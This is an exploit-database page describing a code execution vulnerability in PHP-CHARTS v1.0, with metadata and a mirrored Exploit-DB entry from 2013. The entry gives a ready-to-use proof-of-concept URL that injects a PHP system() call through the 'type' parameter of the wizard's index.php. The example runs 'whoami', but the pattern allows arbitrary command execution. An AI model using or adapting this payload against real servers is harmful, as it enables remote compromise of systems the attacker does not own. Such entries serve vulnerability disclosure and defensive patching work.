header-logo
Suggest Exploit
vendor:
PHP-CHARTS
by:
fizzle stick
7,5
CVSS
HIGH
Code Execution
78
CWE
Product Name: PHP-CHARTS
Affected Version From: v1.0
Affected Version To: v1.0
Patch Exists: Yes
Related CWE: N/A
CPE: 2.3:a:php-charts:php-charts:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2013

PHP-CHARTS v1.0 code execution vulnerability

PHP-charts v1.0 suffers from a code execution vulnerability in the index.php page. An attacker can exploit this vulnerability by sending a crafted HTTP request containing a malicious payload to the vulnerable server. If successful, the web service context will be displayed, usually SYSTEM.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of the software.
Source

Exploit-DB raw data:

# Exploit Title: PHP-CHARTS v1.0 code execution vulnerability
# Date: 05/15/2013
# Exploit Author: fizzle stick
# Vendor Homepage: http://php-charts.com/
# Software Link: http://php-charts.com/downloads/php-chart_v1.0.zip
# Version: v1.0
# Tested on: Windows

Summary: PHP-charts v1.0 suffers from a code execution vulerability in the
index.php page

Exploit:
http://192.168.1.120/phpcharts/wizard/index.php?type=';system('whoami');//

Result: If vulnerable the web service context will be displayed, usually
SYSTEM. ;D

####